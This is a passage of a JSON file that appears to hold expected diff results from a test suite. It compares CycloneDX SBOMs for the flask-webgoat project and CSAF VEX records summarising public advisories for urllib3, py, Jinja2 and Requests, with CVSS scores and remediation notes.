[{"endpoints": ["/create_user"], "name": "users-service"}]}, "test/sbom-python2.json": {"components": [{"version": "1.5.1"}, {"version": "2.10.2"}]}}, "result_7": {"bomFormat": "CycloneDX", "components": [{"bom-ref": "pkg:pypi/flask@1.1.2", "evidence": {"identity": {"confidence": 1, "field": "purl", "methods": [{"confidence": 1, "technique": "instrumentation", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\venv"}]}, "occurrences": [{"location": "flask_webgoat\\__init__.py#20"}, {"location": "flask_webgoat\\actions.py#13"}, {"location": "flask_webgoat\\actions.py#16"}, {"location": "flask_webgoat\\actions.py#19"}, {"location": "flask_webgoat\\actions.py#22"}, {"location": "flask_webgoat\\actions.py#34"}, {"location": "flask_webgoat\\actions.py#4"}, {"location": "flask_webgoat\\actions.py#46"}, {"location": "flask_webgoat\\actions.py#49"}, {"location": "flask_webgoat\\actions.py#6"}, {"location": "flask_webgoat\\actions.py#7"}, {"location": "flask_webgoat\\auth.py#13"}, {"location": "flask_webgoat\\auth.py#23"}, {"location": "flask_webgoat\\auth.py#25"}, {"location": "flask_webgoat\\auth.py#35"}, {"location": "flask_webgoat\\auth.py#4"}, {"location": "flask_webgoat\\auth.py#44"}, {"location": "flask_webgoat\\auth.py#46"}, {"location": "flask_webgoat\\status.py#13"}, {"location": "flask_webgoat\\status.py#3"}, {"location": "flask_webgoat\\status.py#8"}, {"location": "flask_webgoat\\ui.py#14"}, {"location": "flask_webgoat\\ui.py#19"}, {"location": "flask_webgoat\\ui.py#24"}, {"location": "flask_webgoat\\ui.py#6"}, {"location": "flask_webgoat\\users.py#14"}, {"location": "flask_webgoat\\users.py#18"}, {"location": "flask_webgoat\\users.py#24"}, {"location": "flask_webgoat\\users.py#3"}, {"location": "flask_webgoat\\users.py#33"}, {"location": "flask_webgoat\\users.py#44"}, {"location": "flask_webgoat\\users.py#46"}, {"location": "flask_webgoat\\users.py#7"}]}, "name": "flask", "properties": [{"name": "ImportedModules", "value": 
"flask.redirect,flask.render_template,flask.jsonify,flask.Blueprint,flask.session,flask.g,flask.request,flask.Flask"}], "purl": "pkg:pypi/flask@1.1.2", "type": "framework", "version": "1.1.2"}, {"bom-ref": "pkg:pypi/werkzeug@1.0.1", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Werkzeug", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/werkzeug@1.0.1", "type": "library"}, {"bom-ref": "pkg:pypi/jinja2@2.11.3", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Jinja2", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/jinja2@2.11.3", "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": 
"SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"bom-ref": "pkg:github/actions/checkout@v2", "group": "actions", "name": "checkout", "purl": "pkg:github/actions/checkout@v2", "type": "application", "version": "v2"}, {"bom-ref": "pkg:github/actions/setup-python@v2", "group": "actions", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "type": "application", "version": "v2"}], "dependencies": [{"dependsOn": ["pkg:pypi/flask@1.1.2"], "ref": "pkg:pypi/flask-webgoat@latest"}, {"dependsOn": [], "ref": "pkg:pypi/werkzeug@1.0.1"}, {"dependsOn": ["pkg:pypi/markupsafe@1.1.1"], "ref": "pkg:pypi/jinja2@2.11.3"}, {"dependsOn": [], "ref": "pkg:pypi/markupsafe@1.1.1"}, {"dependsOn": []}, {"dependsOn": []}], "metadata": {"authors": [{"name": "OWASP Foundation"}], "component": {"bom-ref": "pkg:gem/flask-webgoat@latest", "name": "flask-webgoat", "purl": "pkg:gem/flask-webgoat@latest", "type": "application", "version": "latest"}, "lifecycles": [{"phase": "build"}], "tools": {"components": [{"author": "OWASP Foundation", "bom-ref": "pkg:npm/@cyclonedx/cdxgen@10.2.1", "group": "@cyclonedx", "name": "cdxgen", "publisher": "OWASP Foundation", "purl": "pkg:npm/%40cyclonedx/cdxgen@10.2.1", "type": "application", "version": "10.2.1"}]}}, "services": [{"authenticated": false, "endpoints": ["/grep_processes", "/message"], "name": "actions-service"}, {"authenticated": false, "endpoints": ["/login", "/login_and_redirect"], "name": "auth-service"}, {"authenticated": false, "endpoints": ["/ping", "/status"], "name": "status-service"}, {"authenticated": false, "endpoints": ["/search"], "name": "ui-service"}, {"authenticated": false}], "specVersion": "1.5", "version": 2}, "result_8": {"components": [{"version": "1.0.1"}, {"version": "2.11.3"}, {"bom-ref": "pkg:pypi/markupsafe@1.1.1", "name": "MarkupSafe", "purl": "pkg:pypi/markupsafe@1.1.1", "version": "1.1.1"}, {"bom-ref": "pkg:pypi/itsdangerous@1.1.0", "name": 
"itsdangerous", "purl": "pkg:pypi/itsdangerous@1.1.0", "version": "1.1.0"}, {"bom-ref": "pkg:pypi/click@7.1.2", "name": "click", "purl": "pkg:pypi/click@7.1.2", "version": "7.1.2"}], "dependencies": [{"ref": "pkg:pypi/itsdangerous@1.1.0"}, {"ref": "pkg:pypi/click@7.1.2"}, {"dependsOn": ["pkg:pypi/click@7.1.2", "pkg:pypi/itsdangerous@1.1.0", "pkg:pypi/jinja2@2.11.3", "pkg:pypi/werkzeug@1.0.1"], "ref": "pkg:pypi/flask@1.1.2"}], "services": [{"endpoints": ["/create_user"], "name": "users-service"}]}, "result_9": {"components": [{"version": "1.5.1"}, {"version": "2.10.2"}]}, "result_13": {"diff_summary": {"test/csaf_1.json": {"vulnerabilities": [{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2023-43804"]}], "cve": "CVE-2023-43804", "cwe": {"id": "200", "name": "Exposure of Sensitive Information to an Unauthorized Actor"}, "discovery_date": "2023-10-02T23:27:05", "ids": [{"system_name": "CVE Record", "text": "CVE-2023-43804"}, {"system_name": "GitHub Advisory", "text": "GHSA-v845-jxx5-vc9f"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2023-192"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# `Cookie` HTTP header isn't stripped on cross-origin redirects urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly. Users **must** handle redirects themselves instead of relying on urllib3's automatic redirects to achieve safe processing of the `Cookie` header, thus we decided to strip the header by default in order to further protect users who aren't using the correct approach. ## Affected usages We believe the number of usages affected by this advisory is low. 
It requires all of the following to be true to be exploited: * Using an affected version of urllib3 (patched in v1.26.17 and v2.0.6) * Using the `Cookie` header on requests, which is mostly typical for impersonating a browser. * Not disabling HTTP redirects * Either not using HTTPS or for the origin server to redirect to a malicious origin. ## Remediation * Upgrading to at least urllib3 v1.26.17 or v2.0.6 * Disabling HTTP redirects using `redirects=False` when sending requests. * Not using the `Cookie` header. ## Related CVE(s) CVE-2023-43804, PYSEC-2023-192"}, {"category": "description", "details": "Vulnerability Description", "text": "`Cookie` HTTP header isn't stripped on cross-origin redirects"}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.0.6"], "known_not_affected": ["urllib3@2.0.6"]}, "references": [{"summary": "GitHub Advisory PYSEC-2023-192", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"}, {"summary": "GitHub Advisory PYSEC-2023-192", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"}, {"summary": "GitHub Advisory GHSA-v845-jxx5-vc9f", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"}, {"summary": "GitHub Advisory GHSA-v845-jxx5-vc9f", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"}, {"summary": "Cve 2023", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 5.9, "environmentalSeverity": "MEDIUM", "integrityImpact": "HIGH", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "HIGH", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 5.9, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.0.6"]}], "title": "CVE-2023-43804/pkg:pypi/urllib3@2.0.4"}]}, "test/csaf_2.json": {}}, 
"common_summary": {"document": {"aggregate_severity": {"text": "High"}, "category": "csaf_vex", "csaf_version": "2.0", "lang": "en", "notes": [{"category": "legal_disclaimer", "text": "Depscan reachable code only covers the project source code, not the code of dependencies. A dependency may execute vulnerable code when called even if it is not in the project's source code. Regard the Depscan-set flag of 'code_not_in_execute_path' with this in mind."}], "publisher": {"category": "vendor", "contact_details": "vendor@mcvendorson.com", "name": "Vendor McVendorson", "namespace": "https://appthreat.com"}, "title": "Your Title"}, "product_tree": {"full_product_names": [{"name": "tinydb", "product_id": "tinydb:4.8.0", "product_identification_helper": {"purl": "pkg:pypi/tinydb@4.8.0"}}]}, "vulnerabilities": [{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2022-42969"]}], "cve": "CVE-2022-42969", "cwe": {"id": "1333", "name": "Inefficient Regular Expression Complexity"}, "discovery_date": "2022-10-16T12:00:23", "ids": [{"system_name": "CVE Record", "text": "CVE-2022-42969"}, {"system_name": "Pypi Advisory", "text": "py"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# ReDoS in py library when used with subversion The py library through 1.11.0 for Python allows remote attackers to conduct a ReDoS (Regular expression Denial of Service) attack via a Subversion repository with crafted info data, because the InfoSvnCommand argument is mishandled. The particular codepath in question is the regular expression at `py._path.svnurl.InfoSvnCommand.lspattern` and is only relevant when dealing with subversion (svn) projects. Notably the codepath is not used in the popular pytest project. The developers of the pytest package have released version `7.2.0` which removes their dependency on `py`. 
Users of `pytest` seeing alerts relating to this advisory may update to version `7.2.0` of `pytest` to resolve this issue. See https://github.com/pytest-dev/py/issues/287#issuecomment-1290407715 for additional context. ## Related CVE(s) CVE-2022-42969, PYSEC-2022-42969"}, {"category": "description", "details": "Vulnerability Description", "text": "ReDoS in py library when used with subversion "}], "product_status": {"known_affected": ["py@vers:pypi/>=0.0.0|<=1.11.0"]}, "references": [{"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42969"}, {"summary": "Cve 2022", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42969"}, {"summary": "Pypi Advisory py", "url": "https://pypi.org/project/py"}, {"summary": "Pypi Advisory py", "url": "https://pypi.org/project/py"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "environmentalScore": 7.5, "environmentalSeverity": "HIGH", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 7.5, "temporalSeverity": "HIGH", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["py@vers:pypi/>=0.0.0|<=1.11.0"]}], "title": "CVE-2022-42969/pkg:pypi/py@1.11.0"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2023-45803"]}], "cve": "CVE-2023-45803", "cwe": {"id": "200", "name": "Exposure of Sensitive Information to an Unauthorized Actor"}, "discovery_date": "2023-10-17T20:15:25", "ids": [{"system_name": "CVE Record", "text": "CVE-2023-45803"}, 
{"system_name": "GitHub Advisory", "text": "GHSA-g4mx-q9vg-27p4"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2023-212"}, {"system_name": "Rfc-editor Advisory", "text": "rfc9110"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# urllib3's request body not stripped after redirect from 303 status changes request method to GET urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 303 \"See Other\" after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although the behavior of removing the request body is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers. From [RFC 9110 Section 9.3.1](https://www.rfc-editor.org/rfc/rfc9110.html#name-get): > A client SHOULD NOT generate content in a GET request unless it is made directly to an origin server that has previously indicated, in or out of band, that such a request has a purpose and will be adequately supported. ## Affected usages Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable. Both of the following conditions must be true to be affected by this vulnerability: * If you're using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) * The origin service is compromised and starts redirecting using 303 to a malicious peer or the redirected-to service becomes compromised. 
## Remediation You can remediate this vulnerability with any of the following steps: * Upgrade to a patched version of urllib3 (v1.26.18 or v2.0.7) * Disable redirects for services that you aren't expecting to respond with redirects with `redirects=False`. * Disable automatic redirects with `redirects=False` and handle 303 redirects manually by stripping the HTTP request body. ## Related CVE(s) CVE-2023-45803, PYSEC-2023-212"}, {"category": "description", "details": "Vulnerability Description", "text": "urllib3's request body not stripped after redirect from 303 status changes request method to GET"}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.0.7"], "known_not_affected": ["urllib3@2.0.7"]}, "references": [{"summary": "GitHub Advisory PYSEC-2023-212", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"}, {"summary": "GitHub Advisory PYSEC-2023-212", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"}, {"summary": "GitHub Advisory GHSA-g4mx-q9vg-27p4", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"}, {"summary": "GitHub Advisory GHSA-g4mx-q9vg-27p4", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"}, {"summary": "Cve 2023", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"}, {"summary": "Rfc-editor Advisory rfc9110", "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"}, {"summary": "Rfc-editor Advisory rfc9110", "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 4.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 4.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "ADJACENT_NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 4.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.0.7"]}], "title": "CVE-2023-45803/pkg:pypi/urllib3@2.0.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-22195"]}], "cve": "CVE-2024-22195", "cwe": {"id": "79", "name": "Improper Neutralization of Input 
During Web Page Generation"}, "discovery_date": "2024-01-11T15:20:48", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-22195"}, {"system_name": "GitHub Advisory", "text": "GHSA-h5c8-rqwp-cp95"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter The `xmlattr` filter in affected versions of Jinja accepts keys containing spaces. XML/HTML attributes cannot contain spaces, as each would then be interpreted as a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. Note that accepting keys as user input is not common or a particularly intended use case of the `xmlattr` filter, and an application doing so should already be verifying what keys are provided regardless of this fix."}, {"category": "description", "details": "Vulnerability Description", "text": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"}], "product_status": {"known_affected": ["jinja2@vers:pypi/>=2.0|<=3.1.2"]}, "references": [{"summary": "GitHub Advisory GHSA-h5c8-rqwp-cp95", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95"}, {"summary": "GitHub Advisory GHSA-h5c8-rqwp-cp95", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2"}, {"summary": "Fedora Project 
Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "environmentalScore": 5.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "LOW", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "LOW", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "products": ["jinja2@vers:pypi/>=2.0|<=3.1.2"]}], "title": "CVE-2024-22195/pkg:pypi/jinja2@3.1.2"}, 
{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-34064"]}], "cve": "CVE-2024-34064", "cwe": {"id": "79", "name": "Improper Neutralization of Input During Web Page Generation"}, "discovery_date": "2024-05-06T14:20:59", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-34064"}, {"system_name": "GitHub Advisory", "text": "GHSA-h75v-3vvj-5mfj"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `>`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for the previous GHSA-h5c8-rqwp-cp95 CVE-2024-22195 only addressed spaces but not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. 
Accepting _values_ as user input continues to be safe."}, {"category": "description", "details": "Vulnerability Description", "text": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"}], "product_status": {"known_affected": ["jinja2@vers:pypi/>=2.0|<=3.1.3"]}, "references": [{"summary": "GitHub Advisory GHSA-h75v-3vvj-5mfj", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"}, {"summary": "GitHub Advisory GHSA-h75v-3vvj-5mfj", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS"}, {"summary": "Fedora Project Mailing List 
Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "environmentalScore": 5.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "LOW", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "LOW", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "products": ["jinja2@vers:pypi/>=2.0|<=3.1.3"]}], "title": "CVE-2024-34064/pkg:pypi/jinja2@3.1.2"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-35195"]}], "cve": "CVE-2024-35195", "cwe": {"id": "670", "name": "Always-Incorrect Control Flow Implementation"}, "discovery_date": "2024-05-20T20:15:00", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-35195"}, {"system_name": "GitHub Advisory", "text": "GHSA-9wx4-h78v-vm56"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Requests `Session` object does not verify requests after making first request with verify=False When making requests through a Requests `Session`, if the first request is made with `verify=False` to disable cert verification, all subsequent requests to the same origin will continue to ignore cert verification regardless of 
